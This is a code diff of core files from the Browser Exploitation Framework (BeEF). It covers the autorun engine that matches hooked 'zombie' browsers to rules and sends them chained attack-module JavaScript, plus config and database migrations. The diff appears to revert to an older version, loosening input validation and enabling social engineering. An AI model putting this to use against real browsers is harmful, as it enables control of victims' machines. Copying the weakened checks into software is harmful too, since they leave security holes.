# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
@@ -146,6 +154,6 @@ beef:
metasploit:
enable: false
social_engineering:
enable: false
enable: true
xssrays:
enable: true

8
core/api.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -29,7 +29,7 @@ module BeEF
#
def register(owner, clss, method, params = [])
unless verify_api_path(clss, method)
print_error "API Registrar: Attempted to register non-existent API method #{clss} :#{method}"
print_error "API Registrar: Attempted to register non-existant API method #{clss} :#{method}"
return
end
@@ -184,7 +184,7 @@ module BeEF
mods = get_owners(clss, mthd, args)
return nil unless mods.length.positive?
unless verify_api_path(clss, mthd) && clss.ancestors.first.to_s.start_with?('BeEF::API')
unless verify_api_path(clss, mthd) && clss.ancestors[0].to_s > 'BeEF::API'
print_error "API Path not defined for Class: #{clss} method: #{mthd}"
return []
end

4
core/api/extension.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

4
core/api/extensions.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/api/main/configuration.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/api/main/migration.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/api/main/network_stack/assethandler.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/api/main/server.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/api/main/server/hook.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/api/module.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/api/modules.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/bootstrap.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/core.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/extension.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/extensions.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/filters.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/filters/base.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

6
core/filters/browser.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -46,7 +46,7 @@ module BeEF
return false if has_non_printable_char?(str)
return true if str.eql? 'UNKNOWN'
return true if str.eql? 'ALL'
return false if !nums_only?(str) and !str.match(/\A(0|[1-9][0-9]{0,3})(\.(0|[1-9][0-9]{0,3})){0,3}\z/)
return false if !nums_only?(str) and !is_valid_float?(str)
return false if str.length > 20
true

4
core/filters/command.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/filters/http.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/filters/page.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/hbmanager.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

4
core/loader.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

4
core/logger.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

7
core/main/ar-migrations/012_create_mass_mailer.rb Normal file
View File

@@ -0,0 +1,7 @@
class CreateMassMailer < ActiveRecord::Migration[6.0]
def change
create_table :mass_mailers do |t|
# TODO: fields
end
end
end

6
core/main/ar-migrations/015_create_http.rb
View File

@@ -4,8 +4,8 @@ class CreateHttp < ActiveRecord::Migration[6.0]
t.text :hooked_browser_id
# The http request to perform. In clear text.
t.text :request
# Boolean value as string to say whether cross-origin requests are allowed
t.boolean :allow_cross_origin, default: true
# Boolean value as string to say whether cross-domain requests are allowed
t.boolean :allow_cross_domain, default: true
# The http response body received. In clear text.
t.text :response_data
# The http response code. Useful to handle cases like 404, 500, 302, ...
@@ -26,7 +26,7 @@ class CreateHttp < ActiveRecord::Migration[6.0]
t.text :domain
# The port on which perform the request.
t.text :port
# Boolean value to say if the request was cross-origin
# Boolean value to say if the request was cross-domain
t.text :has_ran, default: 'waiting'
# The path of the request.
# Example: /secret.html

9
core/main/ar-migrations/022_create_ipec_exploit.rb Normal file
View File

@@ -0,0 +1,9 @@
class CreateIpecExploit < ActiveRecord::Migration[6.0]
def change
create_table :ipec_exploits do |t|
t.text :name
t.text :protocol
t.text :os
end
end
end

9
core/main/ar-migrations/023_create_ipec_exploit_run.rb Normal file
View File

@@ -0,0 +1,9 @@
class CreateIpecExploitRun < ActiveRecord::Migration[6.0]
def change
create_table :ipec_exploit_runs do |t|
t.boolean :launched
t.text :http_headers
t.text :junk_size
end
end
end

2
core/main/ar-migrations/025_create_xssrays_scan.rb
View File

@@ -5,7 +5,7 @@ class CreateXssraysScan < ActiveRecord::Migration[6.0]
t.datetime :scan_start
t.datetime :scan_finish
t.text :domain
t.text :cross_origin
t.text :cross_domain
t.integer :clean_timeout
t.boolean :is_started
t.boolean :is_finished

387
core/main/autorun_engine/engine.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -19,243 +19,31 @@ module BeEF
@debug_on = @config.get('beef.debug')
@VERSION = ['<', '<=', '==', '>=', '>', 'ALL']
@VERSION_STR = %w[XP Vista 7]
end
# Checks if there are any ARE rules to be triggered for the specified hooked browser.
#
# Returns an array with rule IDs that matched and should be triggered.
# if rule_id is specified, checks will be executed only against the specified rule (useful
# for dynamic triggering of new rulesets ar runtime)
def find_matching_rules_for_zombie(browser, browser_version, os, os_version)
rules = BeEF::Core::Models::Rule.all
return if rules.nil?
return if rules.empty?
# TODO: handle cases where there are multiple ARE rules for the same hooked browser.
# maybe rules need to have priority or something?
print_info '[ARE] Checking if any defined rules should be triggered on target.'
match_rules = []
rules.each do |rule|
next unless zombie_matches_rule?(browser, browser_version, os, os_version, rule)
match_rules.push(rule.id)
print_more("Hooked browser and OS match rule: #{rule.name}.")
end
print_more("Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser.")
match_rules
end
# @return [Boolean]
# Note: browser version checks are supporting only major versions, ex: C 43, IE 11
# Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1
def zombie_matches_rule?(browser, browser_version, os, os_version, rule)
return false if rule.nil?
unless zombie_browser_matches_rule?(browser, browser_version, rule)
print_debug("Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : does not match")
return false
end
print_debug("Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : matched")
unless zombie_os_matches_rule?(os, os_version, rule)
print_debug("OS version check -> (hook) #{os_version} #{rule.os_version} (rule): does not match")
return false
end
print_debug("OS version check -> (hook) #{os_version} #{rule.os_version} (rule): matched")
true
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
end
# @return [Boolean]
# TODO: This should be updated to support matching multiple OS (like the browser check below)
def zombie_os_matches_rule?(os, os_version, rule)
return false if rule.nil?
return false unless rule.os == 'ALL' || os == rule.os
# check if the OS versions match
os_ver_rule_cond = rule.os_version.split(' ').first
return true if os_ver_rule_cond == 'ALL'
return false unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
if os_ver_rule_maj == 'XP'
os_ver_rule_maj = 5
os_ver_rule_min = 0
elsif os_ver_rule_maj == 'Vista'
os_ver_rule_maj = 6
os_ver_rule_min = 0
elsif os_ver_rule_maj == '7'
os_ver_rule_maj = 6
os_ver_rule_min = 0
end
# Most of the times Linux/*BSD OS doesn't return any version
# (TODO: improve OS detection on these operating systems)
if !os_version.nil? && !@VERSION_STR.include?(os_version)
os_ver_hook_maj = os_version.split('.').first
os_ver_hook_min = os_version.split('.').last
# the following assignments to 0 are need for later checks like:
# 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
os_ver_hook_min = 0 if os_version.split('.').length == 1
os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
else
# XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
# TODO: BUG: This will fail horribly if the target OS is Windows 7 or newer,
# as no version normalization is performed.
# TODO: Update this for every OS since Vista/7 ...
if os_version == 'XP'
os_ver_hook_maj = 5
os_ver_hook_min = 0
elsif os_version == 'Vista'
os_ver_hook_maj = 6
os_ver_hook_min = 0
elsif os_version == '7'
os_ver_hook_maj = 6
os_ver_hook_min = 0
end
end
if !os_version.nil? || rule.os_version != 'ALL'
os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
return false unless (os_major_version_match && os_minor_version_match)
end
true
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
end
# @return [Boolean]
def zombie_browser_matches_rule?(browser, browser_version, rule)
return false if rule.nil?
b_ver_cond = rule.browser_version.split(' ').first
return false unless @VERSION.include?(b_ver_cond)
b_ver = rule.browser_version.split(' ').last
return false unless BeEF::Filters.is_valid_browserversion?(b_ver)
# check if rule specifies multiple browsers
if rule.browser =~ /\A[A-Z]+\Z/
return false unless rule.browser == 'ALL' || browser == rule.browser
# check if the browser version matches
browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
return false unless browser_version_match
else
browser_match = false
rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
if b == browser || b == 'ALL'
browser_match = true
break
end
end
return false unless browser_match
end
true
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
@VERSION_STR = %w[XP Vista]
end
# Check if the hooked browser type/version and OS type/version match any Rule-sets
# stored in the BeEF::Core::Models::Rule database table
# stored in the BeEF::Core::AutorunEngine::Models::Rule database table
# If one or more Rule-sets do match, trigger the module chain specified
def find_and_run_all_matching_rules_for_zombie(hb_id)
return if hb_id.nil?
hb_details = BeEF::Core::Models::BrowserDetails
browser_name = hb_details.get(hb_id, 'browser.name')
browser_version = hb_details.get(hb_id, 'browser.version')
os_name = hb_details.get(hb_id, 'host.os.name')
os_version = hb_details.get(hb_id, 'host.os.version')
def run(hb_id, browser_name, browser_version, os_name, os_version)
are = BeEF::Core::AutorunEngine::Engine.instance
rules = are.find_matching_rules_for_zombie(browser_name, browser_version, os_name, os_version)
return if rules.nil?
return if rules.empty?
are.run_rules_on_zombie(rules, hb_id)
match_rules = are.match(browser_name, browser_version, os_name, os_version)
are.trigger(match_rules, hb_id) if !match_rules.nil? && match_rules.length > 0
end
# Run the specified rule IDs on the specified zombie ID
# only if the rules match.
def run_matching_rules_on_zombie(rule_ids, hb_id)
return if rule_ids.nil?
return if hb_id.nil?
rule_ids = [rule_ids.to_i] if rule_ids.is_a?(String)
hb_details = BeEF::Core::Models::BrowserDetails
browser_name = hb_details.get(hb_id, 'browser.name')
browser_version = hb_details.get(hb_id, 'browser.version')
os_name = hb_details.get(hb_id, 'host.os.name')
os_version = hb_details.get(hb_id, 'host.os.version')
are = BeEF::Core::AutorunEngine::Engine.instance
rules = are.find_matching_rules_for_zombie(browser_name, browser_version, os_name, os_version)
return if rules.nil?
return if rules.empty?
new_rules = []
rules.each do |rule|
new_rules << rule if rule_ids.include?(rule)
end
return if new_rules.empty?
are.run_rules_on_zombie(new_rules, hb_id)
end
# Run the specified rule IDs on the specified zombie ID
# regardless of whether the rules match.
# Prepare and return the JavaScript of the modules to be sent.
# It also updates the rules ARE execution table with timings
def run_rules_on_zombie(rule_ids, hb_id)
return if rule_ids.nil?
return if hb_id.nil?
def trigger(rule_ids, hb_id)
hb = BeEF::HBManager.get_by_id(hb_id)
hb_session = hb.session
rule_ids = [rule_ids] if rule_ids.is_a?(Integer)
rule_ids.each do |rule_id|
rule = BeEF::Core::Models::Rule.find(rule_id)
modules = JSON.parse(rule.modules)
execution_order = JSON.parse(rule.execution_order)
execution_delay = JSON.parse(rule.execution_delay)
chain_mode = rule.chain_mode
unless %w[sequential nested-forward].include?(chain_mode)
print_error("[ARE] Invalid chain mode '#{chain_mode}' for rule")
return
end
chain_mode = rule.chain_mode
mods_bodies = []
mods_codes = []
@@ -288,13 +76,11 @@ module BeEF
when 'sequential'
wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay, rule_token)
else
# we should never get here. chain mode is validated earlier.
print_error("[ARE] Invalid chain mode '#{chain_mode}'")
next
wrapper = nil
print_error 'Chain mode looks wrong!'
# TODO: catch error, which should never happen as values are checked way before ;-)
end
print_more "Triggering rules #{rule_ids} on HB #{hb_id}"
are_exec = BeEF::Core::Models::Execution.new(
session_id: hb_session,
mod_count: modules.length,
@@ -302,14 +88,14 @@ module BeEF
rule_token: rule_token,
mod_body: wrapper,
is_sent: false,
rule_id: rule_id
id: rule_id
)
are_exec.save!
# Once Engine.check() verified that the hooked browser match a Rule, trigger the Rule ;-)
print_more "Triggering ruleset #{rule_ids} on HB #{hb_id}"
end
end
private
# Wraps module bodies in their own function, using setTimeout to trigger them with an eventual delay.
# Launch order is also taken care of.
# - sequential chain with delays (setTimeout stuff)
@@ -553,18 +339,20 @@ module BeEF
print_error '[ARE] Could not find module end index' if wrapper_end_index.nil?
cleaned_cmd_body = cmd_body.slice(wrapper_start_index..-(wrapper_end_index + 1)).join("\n")
print_error '[ARE] No command to send' if cleaned_cmd_body.eql?('')
# check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number)
return cleaned_cmd_body unless replace_input
if cleaned_cmd_body.include?('"<<mod_input>>"')
cleaned_cmd_body.gsub('"<<mod_input>>"', 'mod_input')
elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
elsif cleaned_cmd_body.include?('<<mod_input>>')
cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
if replace_input
if cleaned_cmd_body.include?('"<<mod_input>>"')
final_cmd_body = cleaned_cmd_body.gsub('"<<mod_input>>"', 'mod_input')
elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
elsif cleaned_cmd_body.include?('<<mod_input>>')
final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
else
return cleaned_cmd_body
end
final_cmd_body
else
cleaned_cmd_body
end
@@ -572,6 +360,129 @@ module BeEF
print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body. #{e.message}"
end
# Checks if there are any ARE rules to be triggered for the specified hooked browser
#
# Note: browser version checks are supporting only major versions, ex: C 43, IE 11
# Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1
#
# Returns an array with rule IDs that matched and should be triggered.
# if rule_id is specified, checks will be executed only against the specified rule (useful
# for dynamic triggering of new rulesets ar runtime)
def match(browser, browser_version, os, os_version, rule_id = nil)
match_rules = []
rules = if rule_id.nil?
BeEF::Core::Models::Rule.all
else
[BeEF::Core::Models::Rule.find(rule_id)]
end
return nil if rules.nil?
return nil unless rules.length > 0
print_info '[ARE] Checking if any defined rules should be triggered on target.'
# TODO: handle cases where there are multiple ARE rules for the same hooked browser.
# TODO the above works well, but maybe rules need to have priority or something?
rules.each do |rule|
browser_match = false
os_match = false
b_ver_cond = rule.browser_version.split(' ').first
b_ver = rule.browser_version.split(' ').last
os_ver_rule_cond = rule.os_version.split(' ').first
os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
# Most of the times Linux/*BSD OS doesn't return any version
# (TODO: improve OS detection on these operating systems)
if !os_version.nil? && !@VERSION_STR.include?(os_version)
os_ver_hook_maj = os_version.split('.').first
os_ver_hook_min = os_version.split('.').last
# the following assignments to 0 are need for later checks like:
# 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
os_ver_hook_min = 0 if os_version.split('.').length == 1
os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
else
# most probably Windows XP or Vista. the following is a hack as Microsoft had the brilliant idea
# to switch from strings to numbers in OS versioning. To prevent rewriting code later on,
# we say that XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
if os_version == 'XP'
os_ver_hook_maj = 5
os_ver_hook_min = 0
end
if os_version == 'Vista'
os_ver_hook_maj = 6
os_ver_hook_min = 0
end
end
if os_ver_rule_maj == 'XP'
os_ver_rule_maj = 5
os_ver_rule_min = 0
end
if os_ver_rule_maj == 'Vista'
os_ver_rule_maj = 6
os_ver_rule_min = 0
end
next unless @VERSION.include?(b_ver_cond)
next unless BeEF::Filters.is_valid_browserversion?(b_ver)
next unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
# os_ver without checks as it can be very different or even empty, for instance on linux/bsd)
# skip rule unless the browser matches
browser_match = false
# check if rule specifies multiple browsers
if rule.browser =~ /\A[A-Z]+\Z/
next unless rule.browser == 'ALL' || browser == rule.browser
# check if the browser version matches
browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
browser_match = if browser_version_match
true
else
false
end
print_more "Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : #{browser_version_match}"
else
rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
browser_match = true if b == browser || b == 'ALL'
end
# else, only one browser
end
next unless browser_match
# skip rule unless the OS matches
next unless rule.os == 'ALL' || os == rule.os
# check if the OS versions match
if !os_version.nil? || rule.os_version != 'ALL'
os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
else
# os_version_match = true if (browser doesn't return an OS version || rule OS version is ALL )
os_major_version_match = true
os_minor_version_match = true
end
os_match = true if os_ver_rule_cond == 'ALL' || (os_major_version_match && os_minor_version_match)
print_more "OS version check -> (hook) #{os_version} #{rule.os_version} (rule): #{os_major_version_match && os_minor_version_match}"
if browser_match && os_match
print_more "Hooked browser and OS type/version MATCH rule: #{rule.name}."
match_rules.push(rule.id)
end
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
end
print_more "Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser type/version."
match_rules
end
# compare versions
def compare_versions(ver_a, cond, ver_b)
return true if cond == 'ALL'

71
core/main/autorun_engine/parser.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -18,63 +18,68 @@ module BeEF
VERSION = ['<', '<=', '==', '>=', '>', 'ALL', 'Vista', 'XP']
CHAIN_MODE = %w[sequential nested-forward]
MAX_VER_LEN = 15
# Parse a JSON ARE file and returns an Hash with the value mappings
def parse(name, author, browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode)
success = [true]
def parse(name, author, browser, browser_version, os, os_version, modules, execution_order, execution_delay, chain_mode)
raise ArgumentError, "Invalid rule name: #{name}" unless BeEF::Filters.is_non_empty_string?(name)
raise ArgumentError, "Invalid author name: #{author}" unless BeEF::Filters.is_non_empty_string?(author)
raise ArgumentError, "Invalid chain_mode definition: #{chain_mode}" unless CHAIN_MODE.include?(chain_mode)
raise ArgumentError, "Invalid os definition: #{os}" unless OS.include?(os)
unless modules.size == execution_delay.size
raise ArgumentError, "Number of execution_delay values (#{execution_delay.size}) must be consistent with number of modules (#{modules.size})"
end
execution_delay.each { |delay| raise TypeError, "Invalid execution_delay value: #{delay}. Values must be Integers." unless delay.is_a?(Integer) }
unless modules.size == execution_order.size
raise ArgumentError, "Number of execution_order values (#{execution_order.size}) must be consistent with number of modules (#{modules.size})"
end
execution_order.each { |order| raise TypeError, "Invalid execution_order value: #{order}. Values must be Integers." unless order.is_a?(Integer) }
return [false, 'Illegal chain_mode definition'] unless CHAIN_MODE.include?(chain_mode)
return [false, 'Illegal rule name'] unless BeEF::Filters.is_non_empty_string?(name)
return [false, 'Illegal author name'] unless BeEF::Filters.is_non_empty_string?(author)
# if multiple browsers were specified, check each browser
if browser.is_a?(Array)
browser.each do |b|
raise ArgumentError, "Invalid browser definition: #{browser}" unless BROWSER.include?(b)
return [false, 'Illegal browser definition'] unless BROWSER.include?(b)
end
# else, if only one browser was specified, check browser and browser version
else
raise ArgumentError, "Invalid browser definition: #{browser}" unless BROWSER.include?(browser)
return [false, 'Illegal browser definition'] unless BROWSER.include?(browser)
if browser_version != 'ALL' && !(VERSION.include?(browser_version[0, 2].gsub(/\s+/, '')) &&
BeEF::Filters.is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/, '')) && browser_version.length < MAX_VER_LEN)
raise ArgumentError, "Invalid browser_version definition: #{browser_version}"
return [false, 'Illegal browser_version definition']
end
end
if os_version != 'ALL' && !(VERSION.include?(os_version[0, 2].gsub(/\s+/, '')) &&
BeEF::Filters.is_valid_osversion?(os_version[2..-1].gsub(/\s+/, '')) && os_version.length < MAX_VER_LEN)
return ArgumentError, "Invalid os_version definition: #{os_version}"
return [false, 'Illegal os_version definition']
end
return [false, 'Illegal os definition'] unless OS.include?(os)
# check if module names, conditions and options are ok
modules.each do |cmd_mod|
mod = BeEF::Core::Models::CommandModule.where(name: cmd_mod['name']).first
if mod.nil?
return [false, "The specified module name (#{cmd_mod['name']}) does not exist"]
else
modk = BeEF::Module.get_key_by_database_id(mod.id)
mod_options = BeEF::Module.get_options(modk)
raise "The specified module name (#{cmd_mod['name']}) does not exist" if mod.nil?
modk = BeEF::Module.get_key_by_database_id(mod.id)
mod_options = BeEF::Module.get_options(modk)
opt_count = 0
mod_options.each do |opt|
if opt['name'] != cmd_mod['options'].keys[opt_count]
raise ArgumentError, "The specified option (#{cmd_mod['options'].keys[opt_count]}) for module (#{cmd_mod['name']}) was not specified"
opt_count = 0
mod_options.each do |opt|
if opt['name'] == cmd_mod['options'].keys[opt_count]
opt_count += 1
else
return [false, "The specified option (#{cmd_mod['options'].keys[opt_count]
}) for module (#{cmd_mod['name']}) does not exist"]
end
end
opt_count += 1
end
end
true
exec_order.each { |order| return [false, 'execution_order values must be Integers'] unless order.integer? }
exec_delay.each { |delay| return [false, 'execution_delay values must be Integers'] unless delay.integer? }
return [false, 'execution_order and execution_delay values must be consistent with modules numbers'] unless
modules.size == exec_order.size && modules.size == exec_delay.size
success
rescue StandardError => e
print_error e.message.to_s
print_debug e.backtrace.join("\n").to_s
[false, 'Something went wrong.']
end
end
end

238
core/main/autorun_engine/rule_loader.rb
View File

@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
